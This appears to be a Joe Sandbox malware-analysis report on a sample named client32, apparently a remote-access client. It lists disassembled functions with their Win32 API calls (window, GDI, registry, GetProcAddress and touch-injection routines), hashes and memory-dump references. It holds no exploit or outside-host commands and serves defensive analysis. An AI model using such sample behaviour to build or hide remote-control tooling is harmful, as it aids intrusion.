Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncpy$_free_malloc$ErrorFreeHeapLast
String ID:
API String ID: 1102513549-0
Opcode ID: 2f1df1e0c88086c9e96fbe33b0170e747102270d287f4437fe11e8fda7f8ecdb
Instruction ID: 0993799ff6b1df3d5f9af4c11cbbccce243fc3b3dc02a8004556a834a5a0d823
Opcode Fuzzy Hash: 2f1df1e0c88086c9e96fbe33b0170e747102270d287f4437fe11e8fda7f8ecdb
Instruction Fuzzy Hash: BC5176B5D142259FDB20DFB8CD84BCABBBCEF15308F004195958897240EBB5A995CFE1

Function 11039710 Relevance: 13.6, APIs: 9, Instructions: 132windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 11039768
GetDlgItem.USER32(00000000,00000001), ref: 11039771
IsWindowEnabled.USER32(00000000), ref: 11039778
PostMessageA.USER32 ref: 110397A5
GetParent.USER32(?), ref: 110397B6
GetWindowRect.USER32(?,?), ref: 110397C3
IntersectRect.USER32(?,?,?), ref: 110397FC
GetWindowRect.USER32(00000000,?), ref: 11039836
SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 11039855

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Rect$Parent$EnabledIntersectItemMessagePost
String ID:
API String ID: 818519836-0
Opcode ID: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
Instruction ID: 21b51dd7fe149e1a5d9ad7f830f962c89668f9ef243aefe38cead8d8046866f3
Opcode Fuzzy Hash: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
Instruction Fuzzy Hash: D8419375A00219EFDB15CFA4CD84FEEB778FB88714F10456AF926A7684EB74A9008B50

Function 11153730 Relevance: 13.6, APIs: 9, Instructions: 128windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 11153763
CreateCompatibleDC.GDI32(00000000), ref: 11153779
SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
SelectObject.GDI32(00000000,00000000), ref: 1115389B
SelectObject.GDI32(00000000,?), ref: 111538C1
SelectPalette.GDI32(00000000,?,00000000), ref: 111538D1
DeleteDC.GDI32(00000000), ref: 111538D8
ReleaseDC.USER32(00000000,?), ref: 111538E7

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
String ID:
API String ID: 602542589-0
Opcode ID: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
Instruction ID: d520eb4ea94c146294e5bc27ee2bf9e491812ef3a8de5d3ff178baa6803be84b
Opcode Fuzzy Hash: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
Instruction Fuzzy Hash: 1751FAF5E102289FDB64DF29CD84799BBB8EF89304F4051E9E619E3240E6705E81CF68

Function 110CD940 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMON

Download Yara Rule

APIs

Part of subcall function 111103D0: GetCurrentThreadId.KERNEL32(75097BD3,00000000,111F1590,?,110CD955,00000000,75097BD3), ref: 111103DE
Part of subcall function 111103D0: EnterCriticalSection.KERNEL32(00000000,75097BD3,00000000,111F1590,?,110CD955,00000000,75097BD3), ref: 111103E8
Part of subcall function 111103D0: LeaveCriticalSection.KERNEL32(00000000,75097809,00000000,?,110CD955,00000000,75097BD3), ref: 11110408

EnterCriticalSection.KERNEL32(00000000,00000000,75097BD3,00000000,75097809,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
SendMessageA.USER32(00000000,00000476,00000000,00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD988
SendMessageA.USER32(00000000,00000475,00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD99A
LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
IsDialogMessageA.USER32(00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9BB
LeaveCriticalSection.KERNEL32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9D1
DestroyWindow.USER32 ref: 110CD9E1
LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9EB
LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CDA01

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
String ID:
API String ID: 1497311044-0
Opcode ID: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
Instruction ID: b02c8bb8fc4c5bab3a2fa1ad08f5b589118d407137368f819e71080725a4af13
Opcode Fuzzy Hash: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
Instruction Fuzzy Hash: 5521D636B41218ABE710DFA8E988BDEB7E9EB49755F0040E6F918D7640D771AD008BE0

Function 11113570 Relevance: 13.6, APIs: 9, Instructions: 77COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000003), ref: 111135A7
FillRect.USER32 ref: 111135C4
FillRect.USER32 ref: 111135D2
SetROP2.GDI32(?,00000007), ref: 111135FE
SetBkMode.GDI32(?,?), ref: 1111360A
SetBkColor.GDI32(?,?), ref: 11113615
SetTextColor.GDI32(?,?), ref: 11113620
SetTextJustification.GDI32(?,?,?), ref: 11113631
SetTextCharacterExtra.GDI32(?,?), ref: 1111363D

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
String ID:
API String ID: 1094208222-0
Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0

Function 1100D4C0 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,11196940,00000000,1100D612,?,1100CB7A,?), ref: 1100D4D4
GetProcAddress.KERNEL32(00000000,11196930,?,1100CB7A,?), ref: 1100D4E8
GetProcAddress.KERNEL32(00000000,11196920,?,1100CB7A,?), ref: 1100D4FD
GetProcAddress.KERNEL32(00000000,11196910,?,1100CB7A,?), ref: 1100D511
GetProcAddress.KERNEL32(00000000,11196904,?,1100CB7A,?), ref: 1100D525
GetProcAddress.KERNEL32(00000000,111968E4,?,1100CB7A,?), ref: 1100D53A
GetProcAddress.KERNEL32(00000000,111968C4,?,1100CB7A,?), ref: 1100D54E
GetProcAddress.KERNEL32(00000000,111968B4,?,1100CB7A,?), ref: 1100D562
GetProcAddress.KERNEL32(00000000,111968A4,?,1100CB7A,?), ref: 1100D577

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
Instruction ID: 68c230a61e409724fd33842e5b4cb172798431ad54f26f9eb7569f07803db95b
Opcode Fuzzy Hash: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
Instruction Fuzzy Hash: E3318CB19127349FEB16CBD8C8C9A79BBE9A758749F80453AD43083248E7B65844CF60

Function 1109D980 Relevance: 13.6, APIs: 9, Instructions: 63fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D98F
CloseHandle.KERNEL32(?), ref: 1109D9A9
CloseHandle.KERNEL32(?), ref: 1109D9B6
CloseHandle.KERNEL32(?), ref: 1109D9C3
SetEvent.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9D5
CloseHandle.KERNEL32(00000000), ref: 1109D9DF
SetEvent.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9F1
CloseHandle.KERNEL32(?), ref: 1109D9FB
CloseHandle.KERNEL32(00000000), ref: 1109DA08

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$Event$FileUnmapView
String ID:
API String ID: 2427653990-0
Opcode ID: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
Instruction ID: ef7400aadcbdc77f3d4b8b656ca31cdf014edcd8fc82e503e85a70b1789423f5
Opcode Fuzzy Hash: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
Instruction Fuzzy Hash: 7B11ECB1A407489BD730EFAAC9D481AFBF9AF583043514D7EE19AC3A10C634E8489B50

Function 11043240 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

_memset.LIBCMT ref: 110433A9
GetSystemMetrics.USER32(0000004C), ref: 110433B9
GetSystemMetrics.USER32(0000004D), ref: 110433C1

Strings

Inject Touch Up @ %d,%d, id=%d, xrefs: 1104348D
Client, xrefs: 11043277
Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d, xrefs: 11043456
DisableTouch, xrefs: 11043272

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsSystem$__wcstoi64_memset
String ID: Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
API String ID: 3760389471-710950153
Opcode ID: f06636ca7976e5648e740387b7cf9cec37ff4d176a2c677b8048423796352473
Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
Opcode Fuzzy Hash: f06636ca7976e5648e740387b7cf9cec37ff4d176a2c677b8048423796352473
Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90

Function 1101F4D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 199COMMON

Download Yara Rule

APIs

InflateRect.USER32 ref: 1101F564
InflateRect.USER32 ref: 1101F5B8
GetBkColor.GDI32(?), ref: 1101F5BE
GetTextColor.GDI32(?), ref: 1101F645

Part of subcall function 1101EF10: GetSysColor.USER32(00000011), ref: 1101EF58
Part of subcall function 1101EF10: SetTextColor.GDI32(?,00000000), ref: 1101EF63
Part of subcall function 1101EF10: SetBkColor.GDI32(?,?), ref: 1101EF81
Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F00D
Part of subcall function 1101EF10: GetSystemMetrics.USER32(00000047), ref: 1101F018
Part of subcall function 1101EF10: DrawTextA.USER32(?,?,?,?,00000024), ref: 1101F056
Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F064

Strings

VUUU, xrefs: 1101F5F6
VUUU, xrefs: 1101F690

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$Text$InflateObjectRectSelect$DrawMetricsSystem
String ID: VUUU$VUUU
API String ID: 179481525-3149182767
Opcode ID: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
Instruction ID: daec56a1ae35cbc085cb1de7b5199678d62f5094ff6f4e18006982d33a32e855
Opcode Fuzzy Hash: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
Instruction Fuzzy Hash: 7F617F75E0020A9BCB04CFA8D881AAEF7F5FB58324F14466AE415A7385DB74FA05CB94

Function 110B78A0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

Part of subcall function 110B0730: _memset.LIBCMT ref: 110B073C
Part of subcall function 110B0730: _memset.LIBCMT ref: 110B076D

Part of subcall function 110B0FA0: timeGetTime.WINMM ref: 110B0FA6
Part of subcall function 110B0FA0: timeGetTime.WINMM ref: 110B1075

WaitForSingleObject.KERNEL32(?,000000FA,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B790D
GetDC.USER32(00000000), ref: 110B7951
GetDeviceCaps.GDI32(00000000,0000000E), ref: 110B795C
GetDeviceCaps.GDI32(00000000,0000000C), ref: 110B7967
ReleaseDC.USER32(00000000,00000000), ref: 110B7973

Part of subcall function 110B3560: SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
Part of subcall function 110B3560: CloseHandle.KERNEL32(?), ref: 110B3585
Part of subcall function 110B3560: CloseHandle.KERNEL32(?), ref: 110B3598
Part of subcall function 110B3560: CloseHandle.KERNEL32(?), ref: 110B35A5
Part of subcall function 110B3560: WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
Part of subcall function 110B3560: CloseHandle.KERNEL32(?), ref: 110B35D0

Strings

TraceScrape, xrefs: 110B78B7
_debug, xrefs: 110B78C4

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$CapsDeviceObjectSingleTimeWait_memsettime$EventRelease__wcstoi64
String ID: TraceScrape$_debug
API String ID: 2936113293-4091781993
Opcode ID: bc3a8f874b993350267bac68b2ae837515d2cb9a288f5247aebbdc5b24175b95
Instruction ID: beb9be5f3decd216f1517493ed5af73f7f61b8e2793af04975b89e9167c73652
Opcode Fuzzy Hash: bc3a8f874b993350267bac68b2ae837515d2cb9a288f5247aebbdc5b24175b95
Instruction Fuzzy Hash: 5F41C779E042465BEB05CFA4C9C1FAF7BB5EB88704F1405A8E805AB285EA70ED04C7E4

Function 11061710 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136registryCOMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

InitializeCriticalSection.KERNEL32(0000000C), ref: 11061790
RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,11195264,00000000,0002001F,00000000,00000008,?), ref: 110617F5
RegCreateKeyExA.ADVAPI32(00000000,?,00000000,11195264,00000000,00020019,00000000,00000008,?), ref: 1106181C
RegCreateKeyExA.ADVAPI32(00000000,ConfigList,00000000,11195264,00000000,0002001F,00000000,?,?), ref: 1106185B
RegCreateKeyExA.ADVAPI32(?,ConfigList,00000000,11195264,00000000,00020019,00000000,?,?), ref: 1106188F

Strings

ConfigList, xrefs: 11061855, 1106187F
PCICTL, xrefs: 110617BE, 110617C9

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
